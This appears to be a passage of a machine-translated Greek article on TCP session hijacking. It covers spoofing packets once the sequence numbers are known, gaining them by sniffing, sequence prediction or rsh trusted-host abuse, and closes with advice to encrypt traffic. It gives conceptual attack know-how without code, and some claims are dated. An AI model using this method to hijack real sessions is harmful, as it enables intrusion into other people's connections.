Από τον αλγόριθμο για τη δημιουργία μιας σύνδεσης TCP που συζητήθηκε παραπάνω, μπορεί να φανεί ότι τα μόνα αναγνωριστικά των συνδρομητών TCP και μιας σύνδεσης TCP είναι δύο παράμετροι 32-bit του αριθμού ακολουθίας και του αριθμού επιβεβαίωσης - ISSa και ISSb. Επομένως, εάν ένας χάκερ καταφέρει να ανακαλύψει τις τρέχουσες τιμές των πεδίων ISSa και ISSb, τότε τίποτα δεν θα τον εμποδίσει να δημιουργήσει ένα παραποιημένο πακέτο TCP. Αυτό σημαίνει ότι ένας χάκερ χρειάζεται μόνο να επιλέξει τις τρέχουσες τιμές των παραμέτρων ISSa και ISSb ενός πακέτου TCP για μια δεδομένη σύνδεση TCP, να στείλει το πακέτο από οποιονδήποτε κεντρικό υπολογιστή Διαδικτύου για λογαριασμό του πελάτη αυτής της σύνδεσης TCP και αυτό το πακέτο θα εκληφθεί ως σωστό!

Ο κίνδυνος πλαστογράφησης πακέτων TCP είναι επίσης σημαντικός επειδή τα πρωτόκολλα FTP και TELNET υψηλού επιπέδου υλοποιούνται με βάση το πρωτόκολλο TCP και η αναγνώριση των πελατών πακέτων FTP και TELNET βασίζεται εξ ολοκλήρου στο πρωτόκολλο TCP.

Επιπλέον, δεδομένου ότι τα πρωτόκολλα FTP και TELNET δεν ελέγχουν τις διευθύνσεις IP των αποστολέων μηνυμάτων, μετά τη λήψη ενός παραποιημένου πακέτου, οι διακομιστές FTP ή TELNET θα στείλουν ένα μήνυμα απάντησης στη διεύθυνση IP του κεντρικού υπολογιστή χάκερ που καθορίζεται στο ψευδές πακέτο. Μετά από αυτό, ο οικοδεσπότης χάκερ θα αρχίσει να εργάζεται με τον διακομιστή FTP ή TELNET από τη διεύθυνση IP του, αλλά με τα δικαιώματα ενός νόμιμα συνδεδεμένου χρήστη, ο οποίος, με τη σειρά του, θα χάσει την επαφή με τον διακομιστή λόγω αναντιστοιχίας μετρητών.

Έτσι, για να πραγματοποιηθεί η επίθεση που περιγράφεται παραπάνω, απαραίτητη και επαρκής προϋπόθεση είναι η γνώση των δύο τρεχουσών παραμέτρων 32-bit ISSa και ISSb που προσδιορίζουν τη σύνδεση TCP. Ας σκεφτούμε πιθανούς τρόπουςτην παραλαβή τους. Στην περίπτωση που ο κεντρικός υπολογιστής χάκερ είναι συνδεδεμένος με το τμήμα δικτύου που δέχεται επίθεση, το έργο της απόκτησης των τιμών των ISSa και ISSb είναι ασήμαντο και μπορεί να επιλυθεί αναλύοντας την κίνηση του δικτύου. Ως εκ τούτου, είναι απαραίτητο να κατανοήσουμε σαφώς ότι το πρωτόκολλο TCP επιτρέπει, καταρχήν, την προστασία μιας σύνδεσης μόνο εάν είναι αδύνατο για έναν εισβολέα να υποκλέψει μηνύματα που μεταδίδονται μέσω αυτή η σύνδεση, δηλαδή, μόνο στην περίπτωση που ο κεντρικός υπολογιστής χάκερ είναι συνδεδεμένος σε τμήμα δικτύου διαφορετικό από το τμήμα συνδρομητή της σύνδεσης TCP.

Επομένως, οι διατμηματικές επιθέσεις παρουσιάζουν το μεγαλύτερο ενδιαφέρον για έναν χάκερ, όταν ο εισβολέας και ο στόχος του βρίσκονται σε διαφορετικά τμήματα δικτύου. Σε αυτήν την περίπτωση, το έργο της απόκτησης των τιμών των ISSa και ISSb δεν είναι ασήμαντο. Για την επίλυση αυτού του προβλήματος, έχουν εφευρεθεί τώρα μόνο δύο μέθοδοι.

Μαθηματική πρόβλεψη της αρχικής τιμής των παραμέτρων σύνδεσης TCP με παρέκταση των προηγούμενων τιμών των ISSa και ISSb.

Εκμετάλλευση τρωτών σημείων στον εντοπισμό συνδρομητών σύνδεσης TCP σε διακομιστές Unix rsh.

Η πρώτη εργασία επιλύεται μέσω εις βάθος μελετών της εφαρμογής του πρωτοκόλλου TCP σε διάφορα λειτουργικά συστήματακαι πλέον έχει καθαρά θεωρητική σημασία. Το δεύτερο πρόβλημα επιλύεται χρησιμοποιώντας τρωτά σημεία Συστήματα Unixμε τον εντοπισμό αξιόπιστων κεντρικών υπολογιστών. (Αξιόπιστος σε σχέση με έναν δεδομένο κεντρικό υπολογιστή Α είναι ένας κεντρικός υπολογιστής δικτύου Β του οποίου ο χρήστης μπορεί να συνδεθεί με τον κεντρικό υπολογιστή Α χωρίς έλεγχο ταυτότητας χρησιμοποιώντας την υπηρεσία r του κεντρικού υπολογιστή Α). Με το χειρισμό των παραμέτρων των πακέτων TCP, ένας χάκερ μπορεί να προσπαθήσει να μιμηθεί έναν αξιόπιστο κεντρικό υπολογιστή και να υποκλέψει μια σύνδεση TCP με τον κεντρικό υπολογιστή που δέχεται επίθεση.

Όλα αυτά είναι πολύ ενδιαφέροντα, αλλά τα πρακτικά αποτελέσματα αυτού του είδους της έρευνας δεν είναι ακόμη ορατά. Ως εκ τούτου, συμβουλεύουμε όλους όσους θέλουν να εμβαθύνουν σε αυτό το θέμα να στραφούν στο βιβλίο, από όπου ελήφθησαν κυρίως οι πληροφορίες που παρουσιάστηκαν παραπάνω.

συμπέρασμα

Η υποκλοπή δεδομένων δικτύου είναι η πιο αποτελεσματική μέθοδος παραβίασης δικτύου, επιτρέποντας σε έναν χάκερ να αποκτήσει σχεδόν όλες τις πληροφορίες που κυκλοφορούν στο δίκτυο. Η μεγαλύτερη πρακτική εξέλιξη έχει επιτευχθεί με τα εργαλεία ρουθουνίσματος, δηλ. Ακούγοντας δίκτυα. Ωστόσο, δεν μπορούμε να αγνοήσουμε μεθόδους υποκλοπής δεδομένων δικτύου, οι οποίες εκτελούνται με παρεμβολή στην κανονική λειτουργία του δικτύου προκειμένου να ανακατευθύνει την κυκλοφορία σε έναν κεντρικό υπολογιστή χάκερ, ειδικά μεθόδους υποκλοπής συνδέσεων TCP. Ωστόσο, στην πράξη, οι μέθοδοι που αναφέρθηκαν τελευταία δεν έχουν ακόμη αναπτυχθεί επαρκώς και πρέπει να βελτιωθούν.

Ένας αντιχάκερ πρέπει να γνωρίζει ότι η μόνη σωτηρία από την υποκλοπή δεδομένων είναι η κρυπτογράφηση τους, δηλ. κρυπτογραφικές μεθόδους προστασίας. Όταν στέλνετε ένα μήνυμα μέσω του δικτύου, θα πρέπει να υποθέσετε εκ των προτέρων ότι το καλωδιακό σύστημα του δικτύου είναι απολύτως ευάλωτο και ότι κάθε χάκερ που είναι συνδεδεμένος στο δίκτυο θα μπορεί να συλλάβει όλα τα μεταδιδόμενα μυστικά μηνύματα από αυτό. Υπάρχουν δύο τεχνολογίες για την επίλυση αυτού του προβλήματος - η δημιουργία ενός δικτύου VPN και η κρυπτογράφηση των ίδιων των μηνυμάτων. Όλες αυτές οι εργασίες επιλύονται πολύ εύκολα χρησιμοποιώντας το πακέτο λογισμικού PGP Desktop Security (η περιγραφή του βρίσκεται, για παράδειγμα, στο).

Δημοφιλή στην κατηγορία: